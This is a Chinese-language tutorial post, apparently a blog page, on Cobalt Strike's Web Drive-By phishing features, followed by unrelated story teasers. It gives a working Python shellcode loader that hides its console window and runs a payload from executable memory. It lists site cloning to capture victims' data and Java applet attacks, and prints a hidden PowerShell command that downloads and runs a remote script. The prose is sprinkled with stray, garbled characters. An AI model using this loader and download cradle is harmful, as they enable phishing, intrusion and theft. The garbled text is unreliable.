Cobalt Strike從入門到精通之Web Drive-By web釣魚攻擊

https://www.bilibili.com/video/BV1P64y1f7e1?p=6

Cobalt Strike Web Drive-By web釣魚攻擊

在這里補充一個上節(jié)課的新的知識點幸逆,如何使用python語言的payload 加載器去攻擊

# length: 894 bytes
from ctypes import *
import ctypes
buf = "" #這里填寫payload
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4
def executable_code(buffer):
    buf = c_char_p(buffer)
    size = len(buffer)
    addr = libc.valloc(size)
    addr = c_void_p(addr)
    if 0 == addr: 
        raise Exception("Failed to allocate memory")
    memmove(addr, buf, size)
    if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
        raise Exception("Failed to set protection on buffer")
    return addr
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(buf)
whnd = ctypes.windll.kernel32.GetConsoleWindow()   
if whnd != 0:
       if 1:
              ctypes.windll.user32.ShowWindow(whnd, 0)   
              ctypes.windll.kernel32.CloseHandle(whnd)
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
                                     buf,
                                     ctypes.c_int(len(shellcode)))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()

模塊介紹

翻譯

這個菜單的中英文翻譯

Manage  對開啟的web服務(wù)進行管理;
Clone Site 克隆網(wǎng)站,可以記錄受害者提交的數(shù)據(jù);
Host File 提供一個文件下載猪半,可以修改Mime信息催什;
Scripted Web Delivery 類似于msf 的web_delivery ;
Signed Applet Attack 使用java自簽名的程序進行釣魚攻擊;
Smart Applet Attack 自動檢測java版本并進行攻擊,針對Java 1.6.0_45以下以及Java 1.7.0_21以下版本鸦列;
System Profiler 用來獲取一些系統(tǒng)信息妥色,比如系統(tǒng)版本搪花,F(xiàn)lash版本,瀏覽器版本等嘹害。
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.149.208:80/test'))"
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末撮竿,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子吼拥,更是在濱河造成了極大的恐慌倚聚,老刑警劉巖,帶你破解...
    沈念sama閱讀 206,126評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件凿可,死亡現(xiàn)場離奇詭異,居然都是意外死亡授账,警方通過查閱死者的電腦和手機枯跑,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,254評論 2 382
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來白热,“玉大人敛助,你說我怎么就攤上這事∥萑罚” “怎么了纳击?”我有些...
    開封第一講書人閱讀 152,445評論 0 341
  • 文/不壞的土叔 我叫張陵,是天一觀的道長攻臀。 經(jīng)常有香客問我焕数,道長,這世上最難降的妖魔是什么刨啸? 我笑而不...
    開封第一講書人閱讀 55,185評論 1 278
  • 正文 為了忘掉前任堡赔,我火速辦了婚禮,結(jié)果婚禮上设联,老公的妹妹穿的比我還像新娘善已。我一直安慰自己灼捂,他們只是感情好,可當我...
    茶點故事閱讀 64,178評論 5 371
  • 文/花漫 我一把揭開白布换团。 她就那樣靜靜地躺著悉稠,像睡著了一般。 火紅的嫁衣襯著肌膚如雪艘包。 梳的紋絲不亂的頭發(fā)上偎球,一...
    開封第一講書人閱讀 48,970評論 1 284
  • 那天,我揣著相機與錄音辑甜,去河邊找鬼衰絮。 笑死,一個胖子當著我的面吹牛磷醋,可吹牛的內(nèi)容都是我干的猫牡。 我是一名探鬼主播,決...
    沈念sama閱讀 38,276評論 3 399
  • 文/蒼蘭香墨 我猛地睜開眼邓线,長吁一口氣:“原來是場噩夢啊……” “哼淌友!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起骇陈,我...
    開封第一講書人閱讀 36,927評論 0 259
  • 序言:老撾萬榮一對情侶失蹤震庭,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后你雌,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體器联,經(jīng)...
    沈念sama閱讀 43,400評論 1 300
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 35,883評論 2 323
  • 正文 我和宋清朗相戀三年婿崭,在試婚紗的時候發(fā)現(xiàn)自己被綠了拨拓。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 37,997評論 1 333
  • 序言:一個原本活蹦亂跳的男人離奇死亡氓栈,死狀恐怖渣磷,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情授瘦,我是刑警寧澤醋界,帶...
    沈念sama閱讀 33,646評論 4 322
  • 正文 年R本政府宣布,位于F島的核電站提完,受9級特大地震影響形纺,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜氯葬,卻給世界環(huán)境...
    茶點故事閱讀 39,213評論 3 307
  • 文/蒙蒙 一挡篓、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧,春花似錦官研、人聲如沸秽澳。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,204評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽担神。三九已至,卻和暖如春始花,著一層夾襖步出監(jiān)牢的瞬間妄讯,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,423評論 1 260
  • 我被黑心中介騙來泰國打工酷宵, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留亥贸,地道東北人。 一個月前我還...
    沈念sama閱讀 45,423評論 2 352
  • 正文 我出身青樓浇垦,卻偏偏與公主長得像炕置,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子男韧,可洞房花燭夜當晚...
    茶點故事閱讀 42,722評論 2 345

推薦閱讀更多精彩內(nèi)容